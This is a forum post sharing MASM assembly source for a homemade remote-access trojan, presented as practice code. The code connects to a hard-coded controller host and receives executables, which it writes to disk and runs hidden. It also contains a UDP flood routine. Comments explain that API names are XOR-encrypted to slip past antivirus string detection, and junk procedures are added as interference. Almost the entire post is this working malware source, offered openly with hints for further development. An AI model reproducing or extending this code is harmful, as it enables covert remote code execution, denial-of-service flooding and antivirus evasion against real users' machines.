看流星社区

 找回密码
 注册账号
查看: 2939|回复: 0

[汇编] 自己前几天用MASM写的一个远控

[复制链接]

该用户从未签到

发表于 2017-6-3 11:11:13 | 显示全部楼层 |阅读模式

最先是在看雪发的 新开空间我也没啥东西 只能拿这个凑数了
;作者:落笔飞花笑百生
;日期:2014/12/20
;用处:练手
;写一个程序虽然很烂但是确实能学到很多,用汇编写程序能逼迫自己去学习以前高级语言中容易忽略的东西虽然还是不够。
;但是至少脱离了只能用别人封装好的库来写程序的恶性循环
;这个程序也没有了写下去的意思,该解决的都解决了我实在想不出来再写他具体能得到什么
;本来想把自己实现的getFUNCaddress加进去的,也没有这样做。
;DLL名称和函数名称由于直接这样写会被某些弱智杀软杀字符串没办法只能xor简单加密一下然后取地址再动态解密一下 这样过了表面
;二次开发的人注意:xor第一个字符不加密的


include androidprotect.inc
.code
dipx byte "192.168.0.101",0
;dipx byte "anyou5.com",0
ganraoz proc


ret


ganraoz endp
_CalcCheckSum  proc    _lpsz,_dwSize


          local  @dwSize





          pushad


          mov   ecx,_dwSize


        shr   ecx,1


        xor   ebx,ebx


        mov   esi,_lpsz


;********************************************************************


; 数据包校验和为每 16 位累加


;********************************************************************


        cld


        @@:


        lodsw


        movzx  eax,ax


        add   ebx,eax


        loop    @B


;********************************************************************


; 最后如果有单 8 位则继续累加


;********************************************************************


        test    _dwSize,1


        jz   @F


        lodsb


        movzx  eax,al


        add   ebx,eax


        @@:


;********************************************************************


; 将高 16 位并入低 16 位后取反输出


;********************************************************************


        mov   eax,ebx


        and   eax,0ffffh


        shr   ebx,16


        add   eax,ebx


        not   ax


        mov   @dwSize,eax


        popad


        mov   eax,@dwSize


        ret





_CalcCheckSum  endp
udpattack proc
invoke m_socket,AF_INET, SOCK_DGRAM, 17
mov udpsock,eax
mov udpSin.sin_family, AF_INET
invoke gethtons,udpport
mov udpSin.sin_port,ax
invoke m_gethostbyname,offset udpip
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
invoke m_inet_ntoa,eax
invoke m_inet_addr,eax
mov udpSin.sin_addr.S_un.S_addr,eax
invoke m_setsockopt,udpsock,SOL_SOCKET,SO_SNDBUF,offset udpbuf,sizeof udpbuf
.while byte ptr [uptrue]==1
invoke GetTickCount
invoke dwtoa,eax,offset udpbuff
invoke lstrlen,offset udpbuff
invoke m_sendto,udpsock,offset udpbuff,eax,0,offset udpSin,sizeof udpSin
.endw
invoke m_closesocket,udpsock
ret


udpattack endp


stringtodw proc string:dword,strsiz:dword
;日期:2014/12/23
;用处:字符串数字无差转换成DWORD
;作者:落笔飞花笑百生
xor eax,eax
mov edi,string
xor ebx ,ebx
xor esi,esi


mov ecx,strsiz


fuckmm:
MOVZX ESI,BYTE PTR DS:[EDI]
cmp esi,0
je close
LEA EAX,DWORD PTR DS:[EBX+EBX*4]
LEA EBX,DWORD PTR DS:[ESI+EAX*2-30h]
INC EDI
loop fuckmm
close:
mov eax,ebx
ret 8
stringtodw endp
xorstring proc dstring,dsize:dword
;解密字符串
mov eax,dstring
mov ecx,dsize
@@:
inc eax
xor byte ptr [eax],5


loop @B


ret
xorstring endp
gethtons proc port :dword
;转换端口




mov eax,dword ptr ss:[ebp+8]
movzx ecx,ax
movzx eax,cl
shl eax,8
shr ecx ,8
or eax,ecx

ret


gethtons endp








midstr proc a,b,cc,d:dword
;截取字符串
push esi
push edi


xor eax,eax
xor ebx,ebx
mov eax,d
mov ebx,cc
sub eax,ebx
mov ecx,eax
cld
mov esi,a
add esi ,cc
mov edi,b
rep movsb
pop esi
pop edi
ret


midstr endp
ganraoy proc




ret


ganraoy endp


start proc
;入口
invoke GetCommandLine
call $+5
call $+5
call $+5




jmp xaxa
xaxa:
call getproaddress
invoke m_WSAStartup,0202h,offset WSAData
.repeat
invoke m_socket,AF_INET, SOCK_STREAM, IPPROTO_TCP
.if eax!=INVALID_SOCKET


mov hSock,eax
mov Sin.sin_family, AF_INET
invoke gethtons,dport
mov Sin.sin_port,ax
invoke m_gethostbyname,offset dipx
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
invoke m_inet_ntoa,eax
invoke m_inet_addr,eax
mov Sin.sin_addr.S_un.S_addr,eax
invoke m_connect,hSock,addr Sin,sizeof Sin


.endif
recvloop:
invoke RtlZeroMemory,offset flag,sizeof flag
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0
.while eax>0 &&eax!=INVALID_SOCKET &&eax!=SOCKET_ERROR

invoke midstr,offset recvbuff,offset flag,0,2
invoke lstrcmpi,offset flag,offset xz
cmp eax,0
je xxz

invoke midstr,offset recvbuff,offset flag,0,2
invoke lstrcmpi,offset flag,offset pe
cmp eax,0
je fuckfile
jmp recvloop
;写出PE文件
fuckfile:
invoke GetCurrentDirectory,260,offset currd
invoke GetTickCount
invoke dwtoa,eax,offset filename
invoke lstrcat ,offset filename,$CTA0(".exe")
invoke lstrcat,offset currd,offset xiegang
invoke lstrcat,offset currd,offset filename
;处理要写出的文件名字和路径
invoke DeleteFile,offset currd
;会以MZ开头的
invoke CreateFile,addr currd,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov hfilehandle,eax
invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL


loopwrite:
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0
    invoke SetFilePointer,hfilehandle,NULL,NULL,FILE_END
    invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL
    invoke GetFileSize,hfilehandle,NULL
    mov writebytes,eax
   cmp eax,dword ptr [dFileSize]
    je close
    jmp loopwrite
   
close:
invoke CloseHandle,hfilehandle
mov dword ptr [dFileSize],0;大小清空
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke WinExec,offset currd,SW_HIDE;传输完毕后执行!
invoke m_send,hSock,offset filecs,sizeof filecs,0
jmp recvloop;
xxz:
invoke lstrlen,offset recvbuff
invoke midstr,offset recvbuff,offset dFileSize,2,eax
invoke lstrlen,offset dFileSize
invoke stringtodw,offset dFileSize,eax
mov dword ptr [dFileSize],eax
invoke m_send,hSock,offset getpe,sizeof getpe,0
jmp recvloop

.endw






invoke m_closesocket,hSock
invoke Sleep,10000
.until CLOSE==TRUE
invoke m_WSACleanup


start endp
winmain proc
invoke CreateThread,NULL,NULL,offset start,NULL,0,NULL;开启小马线程

ret


winmain endp
dwtoa proc dwValueWORD, lpBufferWORD
;整数转换为字符串

nop
nop
nop
nop
nop
nop
nop
nop


  push ebx
  push esi
  push edi


  mov eax, dwValue
  mov edi, [lpBuffer]


  or eax,eax
  jnz sign

zero:
  mov word ptr [edi],30h
  jmp dw2asc

sign:
  jns pos
  mov byte ptr [edi],'-'
  neg eax
  inc edi


pos:   
  mov ecx,429496730
  mov esi, edi


  .while (eax > 0)
   mov ebx,eax
   mul ecx
   mov eax,edx
   lea edx,[edx*4+edx]
   add edx,edx
   sub ebx,edx
   add bl,'0'
   mov [edi],bl
   inc edi
  .endw


  mov byte ptr [edi], 0    ; terminate the string


  ; We now have all the digits, but in reverse order.


  .while (esi < edi)
   dec edi
   mov al, [esi]
   mov ah, [edi]
   mov [edi], al
   mov [esi], ah
   inc esi
  .endw


  dw2asc:


  pop edi
  pop esi
  pop ebx


  ret


dwtoa endp
ganraox proc
push eax
push eax
pop eax
pop eax
mov eax,eax
ret


ganraox endp
ganraoxx proc
push eax
push eax
pop eax
pop eax
mov eax,eax
ret


ganraoxx endp
getproaddress proc
;获取API地址
invoke xorstring,offset ws32dll,sizeof ws32dll
invoke xorstring,offset wstp,sizeof wstp
invoke xorstring,offset sock,sizeof sock
invoke xorstring,offset getby,sizeof getby
invoke xorstring,offset inoa,sizeof inoa
invoke xorstring,offset inaddr,sizeof inaddr
invoke xorstring,offset cont,sizeof cont
invoke xorstring,offset recvx,sizeof recvx
invoke xorstring,offset colses,sizeof colses
invoke xorstring,offset wcl,sizeof wcl
invoke xorstring,offset sed,sizeof sed
invoke xorstring,offset sot,sizeof sot
invoke xorstring,offset sendtot,sizeof sendtot


;上面的CALL是解密字符串
invoke CreateMutex,NULL,NULL,$TA0("bixanhuxakai")
mov mxhand,eax
invoke GetLastError
.if eax== ERROR_ALREADY_EXISTS
invoke CloseHandle,offset mxhand
mov mxhand,0
invoke ExitProcess,NULL
.endif














invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset wstp
mov m_WSAStartup,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sock
mov m_socket,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset getby
mov m_gethostbyname,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset inoa
mov m_inet_ntoa,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset inaddr
mov m_inet_addr,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset cont
mov m_connect,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset recvx
mov m_recv,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset colses
mov m_closesocket,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset wcl
mov m_WSACleanup,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sed
mov m_send,eax


invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sendtot
mov m_sendto,eax


invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sot
mov m_setsockopt,eax
ret


getproaddress endp
ganrao proc


ret


ganrao endp
end winmain






下面是INC文件


.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include C:\Users\巫师\Desktop\RadASM\masm32\macros\Strings.mac


_WSAStartup2 typedef proto :dword,:dword
_WSAStartup typedef ptr _WSAStartup2
_socket2 typedef proto :dword,:dword,:dword
_socket typedef ptr _socket2
_gethostbyname2 typedef proto :dword
_gethostbyname typedef ptr _gethostbyname2
_inet_ntoa2 typedef proto :dword
_inet_ntoa typedef ptr _inet_ntoa2
_inet_addr2 typedef proto :dword
_inet_addr typedef ptr _inet_addr2
_connect2 typedef proto :dword,:dword,:dword
_connect typedef ptr _connect2
_recv2 typedef proto :dword,:dword,:dword,:dword
_recv typedef ptr _recv2
_closesocket2 typedef proto :dword
_closesocket typedef ptr _closesocket2
_WSACleanup2 typedef proto
_WSACleanup typedef ptr _WSACleanup2
_send2 typedef proto :dword,:dword,:dword,:dword
_send typedef ptr _send2
_sendto2 typedef proto :dword,:dword,:dword,:dword,:dword,:dword
_sendto typedef ptr _sendto2
_setsockopt2 typedef proto :dword,:dword,:dword,:dword,:dword
_setsockopt typedef ptr _setsockopt2
getproaddress proto
dwtoa proto :dword,:dword
gethtons proto:dword
.data?
currd byte 260 dup (?)
filename byte 50 dup (?)
ipsize byte 50 dup (?)
recvbuff byte 1024 dup (?);1kb的缓存
Sin   sockaddr_in <>
;UDP
udpSin   sockaddr_in <>
udpbuff byte 200 dup(?)
udpbuf dd 00
udpport dd 00
udpip byte 50 dup (?)
udpsock dd 00
uptrue byte 01h
;UDP
WSAData WSADATA <>
m_WSAStartup _WSAStartup ?
m_socket _socket ?
m_gethostbyname _gethostbyname ?
m_inet_addr _inet_addr ?
m_inet_ntoa _inet_ntoa ?
m_connect _connect ?
m_recv _recv ?
m_closesocket _closesocket ?
m_WSACleanup _WSACleanup ?
m_send _send ?
m_setsockopt _setsockopt ?
m_sendto _sendto ?
.data
hfilehandle dd 00
writebytes dd 00
oldwritebytes dd 00
dFileSize dd 00
mxhand dd 00
xz byte "XZ",0
pe byte "MZ",0
flag byte 5 dup (?)
dport dword 666
CLOSE BOOL FALSE
filecs byte "FILECSWB!",0
getpe byte "GETPE!",0
xiegang byte "\",0
hSock dd 00
datalengh dd 00
ws32dll byte 077h, 076h, 037h, 05Ah, 036h, 037h, 02Bh, 061h, 069h, 069h, 0005h
xa byte 00,00
wstp byte  0057h ,0056h ,0044h ,0056h ,0071h, 0064h ,0077h ,0071h ,0070h ,0075h ,0005h
xb byte 00,00
sock byte 073h ,06Ah ,066h ,06Eh ,060h ,0071h ,005h
xc byte 00,00
getby byte 0067h ,0060h ,0071h ,006Dh ,006Ah ,0076h ,0071h ,0067h ,007Ch ,006Bh ,0064h ,068h ,060h ,005h


xd byte 00,00
inoa byte 0069h ,006Bh ,0060h ,0071h ,005Ah ,006Bh ,0071h ,006Ah ,0064h ,005h




xe byte 00,00
inaddr byte 0069h, 006Bh, 0060h ,0071h, 005Ah, 0064h ,0061h, 0061h, 0077h, 0005h




xf byte 00,00
cont byte 0063h ,006Ah ,006Bh ,006Bh, 0060h, 0066h, 0071h ,0005h




xg byte 00,00
recvx byte 0072h ,0060h ,0066h ,0073h ,0005h




xh byte 00,00
colses byte 0063h ,0069h ,006Ah ,0076h ,0060h ,0076h, 006Ah, 0066h ,006Eh ,0060h ,0071h ,0005h




xi byte 00,00
wcl byte 0057h, 0056h ,0044h, 0046h, 0069h ,060h ,0064h ,006Bh ,0070h ,0075h ,0005h




xj byte 00,00
sed byte  0073h, 0060h, 006Bh, 0061h, 0005h              


xk byte 00,00
sot byte 073h,060h,071h,076h,06Ah,066h,06Eh,06Ah,075h,071h,005h
xl byte 00,00
sendtot byte 073h,060h,06Bh,061h,071h,06Ah,005h
xm byte 00,00
点击按钮快速添加回复内容: 支持 高兴 激动 给力 加油 苦寻 生气 回帖 路过 感恩
您需要登录后才可以回帖 登录 | 注册账号

本版积分规则

小黑屋|手机版|Archiver|看流星社区 |网站地图

GMT+8, 2024-3-19 18:57

Powered by Kanliuxing X3.4

© 2010-2019 kanliuxing.com

快速回复 返回顶部 返回列表